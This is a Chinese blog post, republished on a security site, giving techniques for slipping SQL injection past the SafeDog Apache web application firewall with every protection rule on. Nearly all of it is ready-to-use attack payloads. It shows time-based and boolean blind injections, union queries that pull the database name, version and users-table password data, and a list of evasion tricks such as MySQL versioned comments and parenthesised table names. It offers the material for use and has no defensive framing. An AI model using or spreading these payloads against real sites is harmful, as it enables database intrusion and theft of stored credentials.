过安全狗waf注入方法技巧

颓废
颓废
颓废
441
文章
0
评论
2019年5月19日08:34:01评论700 views字数 873阅读2分54秒阅读模式
摘要

web页面存在注入漏洞 安全狗(APACE版)V4.0 防护规则全开

过安全狗waf注入方法技巧

前提

web页面存在注入漏洞

环境

安全狗(APACE版)V4.0 防护规则全开

绕过

1. 延时盲注 

https://www.0dayhack.com/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+

2. 布尔盲注 

https://www.0dayhack.com/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+

3. 查库名/用户名 

https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -

4. 查版本 

https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -

5. 联合查询 

https://www.0dayhack.com/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -

技巧

1.  

union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)

2. 

select password from => select password*1.from user => select password from (user)

3. 

version() => {/*!f*/version()}

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日08:34:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   过安全狗waf注入方法技巧http://cn-sec.com/archives/67620.html

发表评论

匿名网友 填写信息